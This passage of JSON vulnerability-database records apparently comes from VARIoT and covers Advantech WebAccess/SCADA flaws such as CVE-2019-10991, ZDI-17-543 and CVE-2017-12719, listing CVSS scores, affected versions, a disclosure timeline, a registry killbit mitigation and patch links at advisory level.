0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-32472", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201906-1075", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-142593", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4" }, { "db": "ZDI", "id": "ZDI-19-620" }, { "db": "ZDI", "id": "ZDI-19-586" }, { "db": "ZDI", "id": "ZDI-19-588" }, { "db": "ZDI", "id": "ZDI-19-589" }, { "db": "ZDI", "id": "ZDI-19-592" }, { "db": "ZDI", "id": "ZDI-19-594" }, { "db": "ZDI", "id": "ZDI-19-619" }, { "db": "CNVD", "id": "CNVD-2019-32472" }, { "db": "VULHUB", "id": "VHN-142593" }, { "db": "JVNDB", "id": "JVNDB-2019-005813" }, { "db": "CNNVD", "id": "CNNVD-201906-1075" }, { "db": "NVD", "id": "CVE-2019-10991" } ] }, "description": { "_id": null, "data": "In WebAccess/SCADA, Versions 8.3.5 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. WebAccess/SCADA Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x271C IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities:\n1. A directory-traversal vulnerability\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. Multiple heap-based buffer-overflow vulnerabilities\n4. An information disclosure vulnerability\n5. Multiple remote-code execution vulnerabilities\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (\u00e2??../\u00e2??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. \nAdvantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2019-10991" }, { "db": "JVNDB", "id": "JVNDB-2019-005813" }, { "db": "ZDI", "id": "ZDI-19-620" }, { "db": "ZDI", "id": "ZDI-19-586" }, { "db": "ZDI", "id": "ZDI-19-588" }, { "db": "ZDI", "id": "ZDI-19-589" }, { "db": "ZDI", "id": "ZDI-19-592" }, { "db": "ZDI", "id": "ZDI-19-594" }, { "db": "ZDI", "id": "ZDI-19-619" }, { "db": "CNVD", "id": "CNVD-2019-32472" }, { "db": "BID", "id": "108923" }, { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4" }, { "db": "VULHUB", "id": "VHN-142593" } ], "trust": 7.11 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-10991", "trust": 8.5 }, { "db": "ICS CERT", "id": "ICSA-19-178-05", "trust": 2.8 }, { "db": "ZDI", "id": "ZDI-19-620", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-586", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-588", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-589", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-592", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-594", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-619", "trust": 2.4 }, { "db": "CNNVD", "id": "CNNVD-201906-1075", "trust": 0.9 }, { "db": "BID", "id": "108923", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32472", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-005813", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8191", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7951", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8063", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8064", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-7906", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8117", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8189", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2350", "trust": 0.6 }, { "db": "IVD", "id": "917426FF-7065-403B-BD4D-431E7D3751D4", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-142593", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4" }, { "db": "ZDI", "id": "ZDI-19-620" }, { "db": "ZDI", "id": "ZDI-19-586" }, { "db": "ZDI", "id": "ZDI-19-588" }, { "db": "ZDI", "id": "ZDI-19-589" }, { "db": "ZDI", "id": "ZDI-19-592" }, { "db": "ZDI", "id": "ZDI-19-594" }, { "db": "ZDI", "id": "ZDI-19-619" }, { "db": "CNVD", "id": "CNVD-2019-32472" }, { "db": "VULHUB", "id": "VHN-142593" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005813" }, { "db": "CNNVD", "id": "CNNVD-201906-1075" }, { "db": "NVD", "id": "CVE-2019-10991" } ] }, "id": "VAR-201906-1028", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4" }, { "db": "CNVD", "id": "CNVD-2019-32472" }, { "db": "VULHUB", "id": "VHN-142593" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4" }, { "db": "CNVD", "id": "CNVD-2019-32472" } ] }, "last_update_date": "2024-11-23T21:52:09.434000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 4.9, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess/SCADA Buffer Overflow Vulnerability (CNVD-2019-32472)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181485" }, { "title": "Advantech WebAccess/SCADA Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=94178" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-620" }, { "db": "ZDI", "id": "ZDI-19-586" }, { "db": "ZDI", "id": "ZDI-19-588" }, { "db": "ZDI", "id": "ZDI-19-589" }, { "db": "ZDI", "id": "ZDI-19-592" }, { "db": "ZDI", "id": "ZDI-19-594" }, { "db": "ZDI", "id": "ZDI-19-619" }, { "db": "CNVD", "id": "CNVD-2019-32472" }, { "db": "JVNDB", "id": "JVNDB-2019-005813" }, { "db": "CNNVD", "id": "CNNVD-201906-1075" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-142593" }, { "db": "JVNDB", "id": "JVNDB-2019-005813" }, { "db": "NVD", "id": "CVE-2019-10991" } ] }, "references": { "_id": null, "data": [ { "trust": 7.7, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "trust": 2.3, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-620/" }, { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10991" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-586/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-588/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-589/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-592/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-594/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-619/" }, { "trust": 0.9, "url": "http://webaccess.advantech.com" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10991" }, { "trust": 0.6, "url": "https://www.securityfocus.com/bid/108923" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2350/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-620" }, { "db": "ZDI", "id": "ZDI-19-586" }, { "db": "ZDI", "id": "ZDI-19-588" }, { "db": "ZDI", "id": "ZDI-19-589" }, { "db": "ZDI", "id": "ZDI-19-592" }, { "db": "ZDI", "id": "ZDI-19-594" }, { "db": "ZDI", "id": "ZDI-19-619" }, { "db": "CNVD", "id": "CNVD-2019-32472" }, { "db": "VULHUB", "id": "VHN-142593" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005813" }, { "db": "CNNVD", "id": "CNNVD-201906-1075" }, { "db": "NVD", "id": "CVE-2019-10991" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4", "ident": null }, { "db": "ZDI", "id": "ZDI-19-620", "ident": null }, { "db": "ZDI", "id": "ZDI-19-586", "ident": null }, { "db": "ZDI", "id": "ZDI-19-588", "ident": null }, { "db": "ZDI", "id": "ZDI-19-589", "ident": null }, { "db": "ZDI", "id": "ZDI-19-592", "ident": null }, { "db": "ZDI", "id": "ZDI-19-594", "ident": null }, { "db": "ZDI", "id": "ZDI-19-619", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-32472", "ident": null }, { "db": "VULHUB", "id": "VHN-142593", "ident": null }, { "db": "BID", "id": "108923", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-005813", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201906-1075", "ident": null }, { "db": "NVD", "id": "CVE-2019-10991", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-620", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-586", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-588", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-589", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-592", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-594", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-619", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32472", "ident": null }, { "date": "2019-06-28T00:00:00", "db": "VULHUB", "id": "VHN-142593", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005813", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1075", "ident": null }, { "date": "2019-06-28T21:15:11.307000", "db": "NVD", "id": "CVE-2019-10991", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-620", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-586", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-588", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-589", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-592", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-594", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-619", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32472", "ident": null }, { "date": "2023-03-02T00:00:00", "db": "VULHUB", "id": "VHN-142593", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005813", "ident": null }, { "date": "2020-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1075", "ident": null }, { "date": "2024-11-21T04:20:18.510000", "db": "NVD", "id": "CVE-2019-10991", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-1075" } ], "trust": 0.6 }, "title": { "_id": null, "data": "WebAccess/SCADA Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005813" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "917426ff-7065-403b-bd4d-431e7d3751d4" }, { "db": "CNNVD", "id": "CNNVD-201906-1075" } ], "trust": 0.8 } }
var-201708-1710
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-543", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-543", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4089", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-543", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ] }, "id": "VAR-201708-1710", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:57:41.123000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-543", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-543", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-543", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess TpMegaJVT startSoundRecord Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-543" } ], "trust": 0.7 } }
var-201711-0754
Vulnerability from variot
An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A remote attacker is able to execute code to dereference a pointer within the program causing the application to become unavailable. Advantech WebAccess Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2723 IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to multiple remote code-execution vulnerabilities. Failed exploit attempts will result in a denial-of-service condition. Versions prior to Advantech WebAccess 8.2_20170817 are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a" }, { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" }, { "db": "CNVD", "id": "CNVD-2017-32564" }, { "db": "BID", "id": "101685" }, { "db": "JVNDB", "id": "JVNDB-2017-009931" }, { "db": "CNNVD", "id": "CNNVD-201711-170" }, { "db": "NVD", "id": "CVE-2017-12719" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-009931" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" } ], "trust": 1.4 }, "cve": "CVE-2017-12719", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2017-12719", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-12719", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 1.4, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-32564", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-103269", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2017-12719", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2017-12719", "trust": 1.4, "value": "MEDIUM" }, { "author": "nvd@nist.gov", "id": "CVE-2017-12719", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12719", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-32564", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201711-170", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-103269", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a" }, { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" }, { "db": "CNVD", "id": "CNVD-2017-32564" }, { "db": "VULHUB", "id": "VHN-103269" }, { "db": "JVNDB", "id": "JVNDB-2017-009931" }, { "db": "CNNVD", "id": "CNNVD-201711-170" }, { "db": "NVD", "id": "CVE-2017-12719" } ] }, "description": { "_id": null, "data": "An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A remote attacker is able to execute code to dereference a pointer within the program causing the application to become unavailable. Advantech WebAccess Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2723 IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to multiple remote code-execution vulnerabilities. Failed exploit attempts will result in a denial-of-service condition. \nVersions prior to Advantech WebAccess 8.2_20170817 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-12719" }, { "db": "JVNDB", "id": "JVNDB-2017-009931" }, { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" }, { "db": "CNVD", "id": "CNVD-2017-32564" }, { "db": "BID", "id": "101685" }, { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a" }, { "db": "VULHUB", "id": "VHN-103269" } ], "trust": 3.96 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-12719", "trust": 5.0 }, { "db": "ICS CERT", "id": "ICSA-17-306-02", "trust": 3.4 }, { "db": "BID", "id": "101685", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201711-170", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-32564", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-009931", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4950", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-939", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4951", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-940", "trust": 0.7 }, { "db": "IVD", "id": "324AEB72-83A5-4EC9-8BFB-77E3DF73ED3A", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103269", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a" }, { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" }, { "db": "CNVD", "id": "CNVD-2017-32564" }, { "db": "VULHUB", "id": "VHN-103269" }, { "db": "BID", "id": "101685" }, { "db": "JVNDB", "id": "JVNDB-2017-009931" }, { "db": "CNNVD", "id": "CNNVD-201711-170" }, { "db": "NVD", "id": "CVE-2017-12719" } ] }, "id": "VAR-201711-0754", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a" }, { "db": "CNVD", "id": "CNVD-2017-32564" }, { "db": "VULHUB", "id": "VHN-103269" } ], "trust": 1.582962455 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "324aeb72-83a5-4ec9-8bfb-77e3df73ed3a" }, { "db": "CNVD", "id": "CNVD-2017-32564" } ] }, "last_update_date": "2024-11-23T22:45:33.655000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech WebAccess Pointer Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/105314" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=76156" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-939" }, { "db": "ZDI", "id": "ZDI-17-940" }, { "db": "CNVD", "id": "CNVD-2017-32564" }, { "db": "JVNDB", "id": "JVNDB-2017-009931" }, { "db": "CNNVD", "id": "CNNVD-201711-170" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-476", "trust": 1.9 }, { "problemtype": "CWE-822", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103269" }, { "db": "JVNDB", "id": "JVNDB-2017-009931" }, { "db": "NVD", "id": "CVE-2017-12719" } ] }, "references": { "_id": null, "data": [ { "trust": 4.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-306-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/101685" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12719" }, { "trust": 0.8, "url": 